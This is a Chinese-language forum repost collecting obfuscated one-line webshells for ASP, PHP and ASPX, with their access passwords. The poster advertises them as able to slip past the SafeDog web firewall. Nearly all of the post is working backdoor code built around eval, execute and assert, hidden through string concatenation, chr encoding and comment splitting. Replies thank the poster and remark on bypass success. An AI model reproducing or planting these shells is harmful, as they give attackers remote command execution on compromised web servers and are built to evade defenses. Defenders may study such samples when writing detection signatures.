各种过安全狗一句话木马aspx,asp,php一句话【转载】

90_

几个变性的asp–过防火墙 过狗效果都不错

1. <%Y=request("x")%> <%execute(Y)%>

复制代码

1. <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>

复制代码

这个是90sec发的

1. <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>

复制代码

密码-7
几个变性的php–过防火墙 过狗效果都不错：

1. <!--?php $a = str_replace(x,"","axsxxsxexrxxt");$a($_POST["sz"]); ?-->

复制代码

1. <!--?php $lang = (string)key($_POST);$lang($_POST['sz']); ?-->

复制代码

1. <!--?php $k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);?-->

复制代码

1. <!--?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["sz"]); ?-->

复制代码

这个是90sec发的

1. <!--?php @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?-->

复制代码

密码-7
aspx的 过狗效果不怎么样—不过我认为能支持aspx 百分之8/90支持asp
90sec发的

1. <%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>

复制代码

密码-7

1. <%@ Page Language="Jscript"%><%eval(Request.Item["sz"],"unsafe");%>

复制代码

1. <script type="text/javascript" language="C#">// <![CDATA[
   
2. WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10"); // ]]></script>

复制代码

密码是webadmin

风雨

这个收藏了 我碰见狗一般都是跑的份 郁闷

aaaylb

好像现在不行了，绕不过去了.

吸血鬼

看看怎么用的 拿走看看 谢谢了~

热心网友5

感谢分享这些绕过WAF的经典手法。字符串拼接、注释混淆、chr函数编码这些技巧在对抗特征检测时确实挺实用的，尤其是PHP版本的多层构造思路很典型。ASPX的Jscript配合unsafe参数也是个老套路。不过这些内容最好只用于合法的安全研究和测试环境，可别越过红线。